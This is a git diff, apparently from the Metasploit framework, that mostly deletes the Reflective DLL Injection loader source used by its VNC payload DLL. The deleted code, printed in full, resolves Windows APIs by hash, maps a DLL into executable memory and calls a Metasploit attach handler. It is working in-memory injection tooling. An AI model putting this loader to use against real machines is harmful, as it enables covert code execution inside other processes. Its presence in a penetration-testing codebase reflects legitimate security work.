{7c56685d-83b5-4541-b5dd-a620ffe19b23} + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hpp;hxx;hm;inl;inc;xsd + + + {6b6dd5ba-1f40-449f-a55b-7180bb0793a0} + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav + + + + + Source Files + + + Source Files + + + Source Files\core + + + Source Files\core + + + Source Files\core + + + Source Files\core + + + + + Header Files + + + Header Files + + + Header Files\core + + + Header Files\core + + + Header Files\core + + + + + Resource Files + + + \ No newline at end of file diff --git a/external/source/vncdll/winvnc/ReflectiveDLLInjection.h b/external/source/vncdll/winvnc/ReflectiveDLLInjection.h deleted file mode 100644 index d41b2ac323..0000000000 --- a/external/source/vncdll/winvnc/ReflectiveDLLInjection.h +++ /dev/null @@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/winvnc/ReflectiveLoader.c b/external/source/vncdll/winvnc/ReflectiveLoader.c deleted file mode 100644 index 9d69369824..0000000000 --- a/external/source/vncdll/winvnc/ReflectiveLoader.c +++ /dev/null @@ -1,457 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#ifdef _WIN64 -#pragma intrinsic( _ReturnAddress ) -UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); } -#endif -//===============================================================================================// - -/* - * Use Reflective DLL Injection. - */ -#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA; - GETPROCADDRESS pGetProcAddress; - VIRTUALALLOC pVirtualAlloc; - USHORT usCounter; - - // the initial location of this image in memory - UINT_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - UINT_PTR uiBaseAddress; - - // variables for processing the kernels export table - UINT_PTR uiAddressArray; - UINT_PTR uiNameArray; - UINT_PTR uiExportDir; - UINT_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - UINT_PTR uiHeaderValue; - UINT_PTR uiValueA; - UINT_PTR uiValueB; - UINT_PTR uiValueC; - UINT_PTR uiValueD; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our current EIP -#ifdef _WIN64 - uiLibraryAddress = eip(); -#else - __asm call geteip - __asm geteip: pop uiLibraryAddress -#endif - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else - uiBaseAddress = __readfsdword( 0x30 ); -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - break; - } - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - __movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA ); - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - __movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD ); - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( UINT_PTR ); - if( uiValueD ) - uiValueD += sizeof( UINT_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: process the images exception directory if it has one (PE32+ for x64) -/* - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ]; - // check if their are any exception etries present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // get the number of entries - uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - - // uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all entries - while( uiValueA-- ) - { - //((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress - - // get the next entry - uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - } - } -*/ - // STEP 7: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/vncdll/winvnc/ReflectiveLoader.h b/external/source/vncdll/winvnc/ReflectiveLoader.h deleted file mode 100644 index 224fa0eb68..0000000000 --- a/external/source/vncdll/winvnc/ReflectiveLoader.h +++ /dev/null @@ -1,197 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H -#define _VNCDLL_LOADER_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - - - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/winvnc/VSocket.cpp b/external/source/vncdll/winvnc/VSocket.cpp old mode 100644 new mode 100755 index d9906fd03e..43df3023d0 --- a/external/source/vncdll/winvnc/VSocket.cpp +++ b/external/source/vncdll/winvnc/VSocket.cpp @@ -70,7 +70,7 @@ class VSocket; //////////////////////////////////////////////////////// // *** Lovely hacks to make Win32 work. Hurrah! -#ifdef __WIN32__ +#if defined(__WIN32__) && !defined(EWOULDBLOCK) #define EWOULDBLOCK 